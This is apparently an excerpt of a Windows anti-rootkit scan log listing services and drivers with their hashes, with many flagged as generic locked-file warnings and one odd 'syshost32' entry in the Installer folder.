23:24:12.0344 0x18fc  [ FBD09635227A8026C0F7790F604343C6, 582D40DD57D33BF79642E6DF069E82187EF79978B7192D669FD21678B0D8A9C4 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
23:24:12.0344 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\srvnet.sys. md5: FBD09635227A8026C0F7790F604343C6, sha256: 582D40DD57D33BF79642E6DF069E82187EF79978B7192D669FD21678B0D8A9C4
23:24:12.0344 0x18fc  srvnet - detected LockedFile.Multi.Generic ( 1 )
23:24:12.0344 0x18fc  Object is SCO, delete is not allowed
23:24:12.0344 0x18fc  srvnet ( LockedFile.Multi.Generic ) - warning
23:24:12.0434 0x18fc  [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
23:24:12.0484 0x18fc  SSDPSRV - ok
23:24:12.0504 0x18fc  [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc         C:\Windows\system32\sstpsvc.dll
23:24:12.0564 0x18fc  SstpSvc - ok
23:24:12.0774 0x18fc  [ 81433E112B6BD31B59519BA31EF927DB, DD1776E5729F22C58A4969132E0C105B0E48672ADC4E8FD958A8D5A627596BBA ] Steam Client Service C:\Program Files (x86)\Common Files\Steam\SteamService.exe
23:24:12.0814 0x18fc  Steam Client Service - ok
23:24:12.0854 0x18fc  [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor        C:\Windows\system32\DRIVERS\stexstor.sys
23:24:12.0854 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\stexstor.sys. md5: F3817967ED533D08327DC73BC4D5542A, sha256: 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5
23:24:12.0854 0x18fc  stexstor - detected LockedFile.Multi.Generic ( 1 )
23:24:12.0854 0x18fc  stexstor ( LockedFile.Multi.Generic ) - warning
23:24:13.0024 0x18fc  [ 52D0E33B681BD0F33FDC08812FEE4F7D, BBEBC0773402F6697D2F14F63E5E4FDC2180466E7FDBD306E408535B10160249 ] stisvc          C:\Windows\System32\wiaservc.dll
23:24:13.0074 0x18fc  stisvc - ok
23:24:13.0115 0x18fc  [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum          C:\Windows\system32\DRIVERS\swenum.sys
23:24:13.0115 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\swenum.sys. md5: D01EC09B6711A5F8E7E6564A4D0FBC90, sha256: 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969
23:24:13.0123 0x18fc  swenum - detected LockedFile.Multi.Generic ( 1 )
23:24:13.0123 0x18fc  Object is SCO, delete is not allowed
23:24:13.0123 0x18fc  swenum ( LockedFile.Multi.Generic ) - warning
23:24:13.0123 0x18fc  Force sending object to P2P due to detect: swenum
23:24:13.0124 0x18fc  Object send P2P result: false
23:24:13.0256 0x18fc  [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv           C:\Windows\System32\swprv.dll
23:24:13.0326 0x18fc  swprv - ok
23:24:13.0428 0x18fc  [ B27B083E54709772B1F9F643B29272AB, 344279C9699A98F12439EED7833627730A22EC14E8E7EB55E4AC706A19A55A8E ] syshost32       C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}\syshost.exe
23:24:13.0428 0x18fc  Suspicious file ( NoAccess ): C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}\syshost.exe. md5: B27B083E54709772B1F9F643B29272AB, sha256: 344279C9699A98F12439EED7833627730A22EC14E8E7EB55E4AC706A19A55A8E
23:24:13.0428 0x18fc  syshost32 - detected LockedFile.Multi.Generic ( 1 )
23:24:13.0428 0x18fc  syshost32 ( LockedFile.Multi.Generic ) - warning
23:24:13.0428 0x18fc  Force sending object to P2P due to detect: syshost32
23:24:13.0428 0x18fc  Object send P2P result: false
23:24:13.0640 0x18fc  [ 3C1284516A62078FB68F768DE4F1A7BE, 67ECD462335EF88773E4BAEAB230A68EC92A25F8CD8F115873F669205AE6A1A9 ] SysMain         C:\Windows\system32\sysmain.dll
23:24:13.0715 0x18fc  SysMain - ok
23:24:13.0737 0x18fc  [ 238935C3CF2854886DC7CBB2A0E2CC66, BBF7A70BF218A544CC1A6FB81F75EAD29D418794162936BE197D6D61FE0DB1C4 ] TabletInputService C:\Windows\System32\TabSvc.dll
23:24:13.0762 0x18fc  TabletInputService - ok
23:24:13.0792 0x18fc  [ 884264AC597B690C5707C89723BB8E7B, 9BF209A4128019421F7EC4AFF71103C5F411DB6CFB32AAC1633E789AD7A30708 ] TapiSrv         C:\Windows\System32\tapisrv.dll
23:24:13.0840 0x18fc  TapiSrv - ok
23:24:13.0855 0x18fc  [ 1BE03AC720F4D302EA01D40F588162F6, AB644862BF1D2E824FD846180DEC4E2C0FAFCC517451486DE5A92E5E78A952E4 ] TBS             C:\Windows\System32\tbssvc.dll
23:24:13.0952 0x18fc  TBS - ok
23:24:14.0036 0x18fc  [ 90A2D722CF64D911879D6C4A4F802A4D, 2D825BC1FD73315BF51F36CAEF6A8EFE9042A4C260151C6351064260CF699194 ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
23:24:14.0037 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\tcpip.sys. md5: 90A2D722CF64D911879D6C4A4F802A4D, sha256: 2D825BC1FD73315BF51F36CAEF6A8EFE9042A4C260151C6351064260CF699194
23:24:14.0044 0x18fc  Tcpip - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0044 0x18fc  Object is SCO, delete is not allowed
23:24:14.0044 0x18fc  Tcpip ( LockedFile.Multi.Generic ) - warning
23:24:14.0044 0x18fc  Force sending object to P2P due to detect: Tcpip
23:24:14.0044 0x18fc  Object send P2P result: false
23:24:14.0114 0x18fc  [ 90A2D722CF64D911879D6C4A4F802A4D, 2D825BC1FD73315BF51F36CAEF6A8EFE9042A4C260151C6351064260CF699194 ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
23:24:14.0114 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\tcpip.sys. md5: 90A2D722CF64D911879D6C4A4F802A4D, sha256: 2D825BC1FD73315BF51F36CAEF6A8EFE9042A4C260151C6351064260CF699194
23:24:14.0125 0x18fc  TCPIP6 - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0125 0x18fc  Object is SCO, delete is not allowed
23:24:14.0125 0x18fc  TCPIP6 ( LockedFile.Multi.Generic ) - warning
23:24:14.0152 0x18fc  [ 76D078AF6F587B162D50210F761EB9ED, 3813171036B4036306CADC29F877ADAE44B241DDF65B3699C352B7CDA9EC68C9 ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
23:24:14.0152 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\tcpipreg.sys. md5: 76D078AF6F587B162D50210F761EB9ED, sha256: 3813171036B4036306CADC29F877ADAE44B241DDF65B3699C352B7CDA9EC68C9
23:24:14.0152 0x18fc  tcpipreg - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0153 0x18fc  Object is SCO, delete is not allowed
23:24:14.0153 0x18fc  tcpipreg ( LockedFile.Multi.Generic ) - warning
23:24:14.0153 0x18fc  Force sending object to P2P due to detect: tcpipreg
23:24:14.0154 0x18fc  Object send P2P result: false
23:24:14.0173 0x18fc  [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
23:24:14.0173 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\tdpipe.sys. md5: 3371D21011695B16333A3934340C4E7C, sha256: 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D
23:24:14.0173 0x18fc  TDPIPE - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0174 0x18fc  Object is SCO, delete is not allowed
23:24:14.0174 0x18fc  TDPIPE ( LockedFile.Multi.Generic ) - warning
23:24:14.0186 0x18fc  [ E4245BDA3190A582D55ED09E137401A9, F59C983882997D68CC7B1B2080AEE9EBE2AE90D478F877559BD2AAA97158A116 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
23:24:14.0186 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\tdtcp.sys. md5: E4245BDA3190A582D55ED09E137401A9, sha256: F59C983882997D68CC7B1B2080AEE9EBE2AE90D478F877559BD2AAA97158A116
23:24:14.0186 0x18fc  TDTCP - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0186 0x18fc  Object is SCO, delete is not allowed
23:24:14.0186 0x18fc  TDTCP ( LockedFile.Multi.Generic ) - warning
23:24:14.0186 0x18fc  Force sending object to P2P due to detect: TDTCP
23:24:14.0186 0x18fc  Object send P2P result: false
23:24:14.0236 0x18fc  [ 079125C4B17B01FCAEEBCE0BCB290C0F, B2DF1F2317EF5DCF0A89327332E9F2770ED604005B3138C095FF01AA63B91437 ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
23:24:14.0236 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\tdx.sys. md5: 079125C4B17B01FCAEEBCE0BCB290C0F, sha256: B2DF1F2317EF5DCF0A89327332E9F2770ED604005B3138C095FF01AA63B91437
23:24:14.0236 0x18fc  tdx - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0236 0x18fc  Object is SCO, delete is not allowed
23:24:14.0236 0x18fc  tdx ( LockedFile.Multi.Generic ) - warning
23:24:14.0246 0x18fc  [ C448651339196C0E869A355171875522, C12441CF21D7D47804952B968689D78E3BA0323A90C4C811B54A6B2E6260BAD4 ] TermDD          C:\Windows\system32\DRIVERS\termdd.sys
23:24:14.0246 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\termdd.sys. md5: C448651339196C0E869A355171875522, sha256: C12441CF21D7D47804952B968689D78E3BA0323A90C4C811B54A6B2E6260BAD4
23:24:14.0246 0x18fc  TermDD - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0256 0x18fc  Object is SCO, delete is not allowed
23:24:14.0256 0x18fc  TermDD ( LockedFile.Multi.Generic ) - warning
23:24:14.0318 0x18fc  [ 0F05EC2887BFE197AD82A13287D2F404, 78C8A8FE9B1101430CA79875DA34413C35B6D7A5EE1932E454C50731335437A6 ] TermService     C:\Windows\System32\termsrv.dll
23:24:14.0423 0x18fc  TermService - ok
23:24:14.0438 0x18fc  [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes          C:\Windows\system32\themeservice.dll
23:24:14.0453 0x18fc  Themes - ok
23:24:14.0480 0x18fc  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER     C:\Windows\system32\mmcss.dll
23:24:14.0510 0x18fc  THREADORDER - ok
23:24:14.0535 0x18fc  [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks          C:\Windows\System32\trkwks.dll
23:24:14.0582 0x18fc  TrkWks - ok
23:24:14.0662 0x18fc  [ 840F7FB849F5887A49BA18C13B2DA920, A59C40A090E03C0136A865FC54508BA938E7B467C8198BC009FE263E6C275781 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
23:24:14.0682 0x18fc  TrustedInstaller - ok
23:24:14.0692 0x18fc  [ 61B96C26131E37B24E93327A0BD1FB95, 7C551B6FD0447258BC3FDED72D8D41A0E8B731562170C264295592D45F85D9FF ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
23:24:14.0692 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\tssecsrv.sys. md5: 61B96C26131E37B24E93327A0BD1FB95, sha256: 7C551B6FD0447258BC3FDED72D8D41A0E8B731562170C264295592D45F85D9FF
23:24:14.0692 0x18fc  tssecsrv - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0692 0x18fc  Object is SCO, delete is not allowed
23:24:14.0692 0x18fc  tssecsrv ( LockedFile.Multi.Generic ) - warning
23:24:14.0712 0x18fc  [ 3836171A2CDF3AF8EF10856DB9835A70, 74CD0A21B4E5B47E8D762CC28282CA8D512D424EC591D90099B9F8D034AA2FC2 ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
23:24:14.0712 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\tunnel.sys. md5: 3836171A2CDF3AF8EF10856DB9835A70, sha256: 74CD0A21B4E5B47E8D762CC28282CA8D512D424EC591D90099B9F8D034AA2FC2
23:24:14.0712 0x18fc  tunnel - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0712 0x18fc  Object is SCO, delete is not allowed
23:24:14.0712 0x18fc  tunnel ( LockedFile.Multi.Generic ) - warning
23:24:14.0732 0x18fc  [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35          C:\Windows\system32\DRIVERS\uagp35.sys
23:24:14.0732 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\uagp35.sys. md5: B4DD609BD7E282BFC683CEC7EAAAAD67, sha256: EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123
23:24:14.0732 0x18fc  uagp35 - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0732 0x18fc  Object is SCO, delete is not allowed
23:24:14.0732 0x18fc  uagp35 ( LockedFile.Multi.Generic ) - warning
23:24:14.0772 0x18fc  [ D47BAEAD86C65D4F4069D7CE0A4EDCEB, DBAEA010F11A5EFD961B1841308EA3F220A9FFB01F364BA9B8F72200DA2BBCD8 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
23:24:14.0772 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\udfs.sys. md5: D47BAEAD86C65D4F4069D7CE0A4EDCEB, sha256: DBAEA010F11A5EFD961B1841308EA3F220A9FFB01F364BA9B8F72200DA2BBCD8
23:24:14.0772 0x18fc  udfs - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0782 0x18fc  Object is SCO, delete is not allowed
23:24:14.0782 0x18fc  udfs ( LockedFile.Multi.Generic ) - warning
23:24:14.0832 0x18fc  [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect       C:\Windows\system32\UI0Detect.exe
23:24:14.0842 0x18fc  UI0Detect - ok
23:24:14.0872 0x18fc  [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx        C:\Windows\system32\DRIVERS\uliagpkx.sys
23:24:14.0872 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\uliagpkx.sys. md5: 4BFE1BC28391222894CBF1E7D0E42320, sha256: 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A
23:24:14.0872 0x18fc  uliagpkx - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0872 0x18fc  Object is SCO, delete is not allowed
23:24:14.0872 0x18fc  uliagpkx ( LockedFile.Multi.Generic ) - warning
23:24:14.0872 0x18fc  Force sending object to P2P due to detect: uliagpkx
23:24:14.0882 0x18fc  Object send P2P result: false
23:24:14.0892 0x18fc  [ EAB6C35E62B1B0DB0D1B48B671D3A117, E65034BF757AE4D21F69D7A91A7990E326A29A0CE9F871FD704B5E6CCC821FF0 ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
23:24:14.0892 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\umbus.sys. md5: EAB6C35E62B1B0DB0D1B48B671D3A117, sha256: E65034BF757AE4D21F69D7A91A7990E326A29A0CE9F871FD704B5E6CCC821FF0
23:24:14.0902 0x18fc  umbus - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0902 0x18fc  Object is SCO, delete is not allowed
23:24:14.0902 0x18fc  umbus ( LockedFile.Multi.Generic ) - warning
23:24:14.0912 0x18fc  [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass          C:\Windows\system32\DRIVERS\umpass.sys
23:24:14.0912 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\umpass.sys. md5: B2E8E8CB557B156DA5493BBDDCC1474D, sha256: F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43
23:24:14.0912 0x18fc  UmPass - detected LockedFile.Multi.Generic ( 1 )
23:24:14.0912 0x18fc  Object is SCO, delete is not allowed
23:24:14.0912 0x18fc  UmPass ( LockedFile.Multi.Generic ) - warning
23:24:15.0014 0x18fc  [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost        C:\Windows\System32\upnphost.dll
23:24:15.0054 0x18fc  upnphost - ok
23:24:15.0144 0x18fc  [ C9E9D59C0099A9FF51697E9306A44240, 78D9A7A5E5742962B6978F475BF06CB32262F1D214699D3D40538476A58012A1 ] USBAAPL64       C:\Windows\system32\Drivers\usbaapl64.sys
23:24:15.0144 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\usbaapl64.sys. md5: C9E9D59C0099A9FF51697E9306A44240, sha256: 78D9A7A5E5742962B6978F475BF06CB32262F1D214699D3D40538476A58012A1
23:24:15.0145 0x18fc  USBAAPL64 - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0145 0x18fc  USBAAPL64 ( LockedFile.Multi.Generic ) - warning
23:24:15.0216 0x18fc  [ 77B01BC848298223A95D4EC23E1785A1, 7D0FBBA746588401400226BB966507EE34EEBB2F4F16607601E3D7383CAD34E2 ] usbaudio        C:\Windows\system32\drivers\usbaudio.sys
23:24:15.0216 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\usbaudio.sys. md5: 77B01BC848298223A95D4EC23E1785A1, sha256: 7D0FBBA746588401400226BB966507EE34EEBB2F4F16607601E3D7383CAD34E2
23:24:15.0216 0x18fc  usbaudio - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0216 0x18fc  usbaudio ( LockedFile.Multi.Generic ) - warning
23:24:15.0216 0x18fc  Force sending object to P2P due to detect: usbaudio
23:24:15.0216 0x18fc  Object send P2P result: false
23:24:15.0236 0x18fc  [ B26AFB54A534D634523C4FB66765B026, A219C9AE32D040BEA4DD69C2C826B1C52BACE26BEBFEE799BD56DFD442C5E0D8 ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
23:24:15.0236 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbccgp.sys. md5: B26AFB54A534D634523C4FB66765B026, sha256: A219C9AE32D040BEA4DD69C2C826B1C52BACE26BEBFEE799BD56DFD442C5E0D8
23:24:15.0236 0x18fc  usbccgp - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0236 0x18fc  Object is SCO, delete is not allowed
23:24:15.0236 0x18fc  usbccgp ( LockedFile.Multi.Generic ) - warning
23:24:15.0246 0x18fc  [ AF0892A803FDDA7492F595368E3B68E7, F263346DEB4D742EB436CF578F187AC8521D84CED52E98475E6198EC52244F07 ] usbcir          C:\Windows\system32\DRIVERS\usbcir.sys
23:24:15.0256 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbcir.sys. md5: AF0892A803FDDA7492F595368E3B68E7, sha256: F263346DEB4D742EB436CF578F187AC8521D84CED52E98475E6198EC52244F07
23:24:15.0256 0x18fc  usbcir - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0256 0x18fc  Object is SCO, delete is not allowed
23:24:15.0256 0x18fc  usbcir ( LockedFile.Multi.Generic ) - warning
23:24:15.0257 0x18fc  Force sending object to P2P due to detect: usbcir
23:24:15.0258 0x18fc  Object send P2P result: false
23:24:15.0277 0x18fc  [ 2EA4AFF7BE7EB4632E3AA8595B0803B5, CBECE7CEC0EFA4B283C63E9B6A270D595F5F3D006306DA5E5121BBFDCAB16376 ] usbehci         C:\Windows\system32\DRIVERS\usbehci.sys
23:24:15.0278 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbehci.sys. md5: 2EA4AFF7BE7EB4632E3AA8595B0803B5, sha256: CBECE7CEC0EFA4B283C63E9B6A270D595F5F3D006306DA5E5121BBFDCAB16376
23:24:15.0278 0x18fc  usbehci - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0278 0x18fc  Object is SCO, delete is not allowed
23:24:15.0278 0x18fc  usbehci ( LockedFile.Multi.Generic ) - warning
23:24:15.0318 0x18fc  [ 4C9042B8DF86C1E8E6240C218B99B39B, D286633311C047B9C4FB1AA89D7B02B9F943FDDCE473255DC8E14DD07CC9B292 ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
23:24:15.0318 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbhub.sys. md5: 4C9042B8DF86C1E8E6240C218B99B39B, sha256: D286633311C047B9C4FB1AA89D7B02B9F943FDDCE473255DC8E14DD07CC9B292
23:24:15.0318 0x18fc  usbhub - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0328 0x18fc  Object is SCO, delete is not allowed
23:24:15.0328 0x18fc  usbhub ( LockedFile.Multi.Generic ) - warning
23:24:15.0338 0x18fc  [ 58E546BBAF87664FC57E0F6081E4F609, 1DD99D57369A0069654432AB5325AFD8F7D422D531E053EA05FF664BA6BDAEF9 ] usbohci         C:\Windows\system32\DRIVERS\usbohci.sys
23:24:15.0338 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbohci.sys. md5: 58E546BBAF87664FC57E0F6081E4F609, sha256: 1DD99D57369A0069654432AB5325AFD8F7D422D531E053EA05FF664BA6BDAEF9
23:24:15.0338 0x18fc  usbohci - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0338 0x18fc  Object is SCO, delete is not allowed
23:24:15.0338 0x18fc  usbohci ( LockedFile.Multi.Generic ) - warning
23:24:15.0418 0x18fc  [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
23:24:15.0418 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbprint.sys. md5: 73188F58FB384E75C4063D29413CEE3D, sha256: B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C
23:24:15.0418 0x18fc  usbprint - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0418 0x18fc  Object is SCO, delete is not allowed
23:24:15.0418 0x18fc  usbprint ( LockedFile.Multi.Generic ) - warning
23:24:15.0418 0x18fc  Force sending object to P2P due to detect: usbprint
23:24:15.0418 0x18fc  Object send P2P result: false
23:24:15.0458 0x18fc  [ 080D3820DA6C046BE82FC8B45A893E83, EF4829A2D5B8D47AA7E06093EC85244042ED1CCFF43CC80DC44EF018B434197A ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
23:24:15.0458 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\USBSTOR.SYS. md5: 080D3820DA6C046BE82FC8B45A893E83, sha256: EF4829A2D5B8D47AA7E06093EC85244042ED1CCFF43CC80DC44EF018B434197A
23:24:15.0458 0x18fc  USBSTOR - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0458 0x18fc  USBSTOR ( LockedFile.Multi.Generic ) - warning
23:24:15.0458 0x18fc  Force sending object to P2P due to detect: USBSTOR
23:24:15.0458 0x18fc  Object send P2P result: false
23:24:15.0478 0x18fc  [ 81FB2216D3A60D1284455D511797DB3D, 121E52B18A1832E775EA0AE2E053BAA53E5A70E9754724B1449AE5992D63B13E ] usbuhci         C:\Windows\system32\DRIVERS\usbuhci.sys
23:24:15.0478 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\usbuhci.sys. md5: 81FB2216D3A60D1284455D511797DB3D, sha256: 121E52B18A1832E775EA0AE2E053BAA53E5A70E9754724B1449AE5992D63B13E
23:24:15.0478 0x18fc  usbuhci - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0478 0x18fc  Object is SCO, delete is not allowed
23:24:15.0478 0x18fc  usbuhci ( LockedFile.Multi.Generic ) - warning
23:24:15.0528 0x18fc  [ D501E12614B00A3252073101D6A1A74B, DFA3A83978125B3CE45C71DD9069E8A7938366D0F4B4B2401CDD07251253FA8C ] usbvideo        C:\Windows\system32\Drivers\usbvideo.sys
23:24:15.0528 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\usbvideo.sys. md5: D501E12614B00A3252073101D6A1A74B, sha256: DFA3A83978125B3CE45C71DD9069E8A7938366D0F4B4B2401CDD07251253FA8C
23:24:15.0528 0x18fc  usbvideo - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0528 0x18fc  usbvideo ( LockedFile.Multi.Generic ) - warning
23:24:15.0528 0x18fc  Force sending object to P2P due to detect: usbvideo
23:24:15.0528 0x18fc  Object send P2P result: false
23:24:15.0548 0x18fc  [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms           C:\Windows\System32\uxsms.dll
23:24:15.0578 0x18fc  UxSms - ok
23:24:15.0598 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] VaultSvc        C:\Windows\system32\lsass.exe
23:24:15.0608 0x18fc  VaultSvc - ok
23:24:15.0618 0x18fc  [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot        C:\Windows\system32\DRIVERS\vdrvroot.sys
23:24:15.0628 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vdrvroot.sys. md5: C5C876CCFC083FF3B128F933823E87BD, sha256: 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D
23:24:15.0628 0x18fc  vdrvroot - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0628 0x18fc  Object is SCO, delete is not allowed
23:24:15.0628 0x18fc  vdrvroot ( LockedFile.Multi.Generic ) - warning
23:24:15.0710 0x18fc  [ 44D73E0BBC1D3C8981304BA15135C2F2, 2849387BBCFB0189AF5604D2F7A631BD5D6BBB2CA73AF6E870069AF382A74DED ] vds             C:\Windows\System32\vds.exe
23:24:15.0790 0x18fc  vds - ok
23:24:15.0820 0x18fc  [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
23:24:15.0820 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vgapnp.sys. md5: DA4DA3F5E02943C2DC8C6ED875DE68DD, sha256: EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838
23:24:15.0820 0x18fc  vga - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0820 0x18fc  Object is SCO, delete is not allowed
23:24:15.0820 0x18fc  vga ( LockedFile.Multi.Generic ) - warning
23:24:15.0820 0x18fc  Force sending object to P2P due to detect: vga
23:24:15.0820 0x18fc  Object send P2P result: false
23:24:15.0840 0x18fc  [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave         C:\Windows\System32\drivers\vga.sys
23:24:15.0840 0x18fc  Suspicious file ( NoAccess ): C:\Windows\System32\drivers\vga.sys. md5: 53E92A310193CB3C03BEA963DE7D9CFC, sha256: 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125
23:24:15.0840 0x18fc  VgaSave - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0840 0x18fc  Object is SCO, delete is not allowed
23:24:15.0840 0x18fc  VgaSave ( LockedFile.Multi.Generic ) - warning
23:24:15.0860 0x18fc  [ C82E748660F62A242B2DFAC1442F22A4, 24AD6CAA918C5AB6F461D88825885C8637C224001AAD7A80BDC240368CDB0B7E ] vhdmp           C:\Windows\system32\DRIVERS\vhdmp.sys
23:24:15.0860 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vhdmp.sys. md5: C82E748660F62A242B2DFAC1442F22A4, sha256: 24AD6CAA918C5AB6F461D88825885C8637C224001AAD7A80BDC240368CDB0B7E
23:24:15.0860 0x18fc  vhdmp - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0860 0x18fc  vhdmp ( LockedFile.Multi.Generic ) - warning
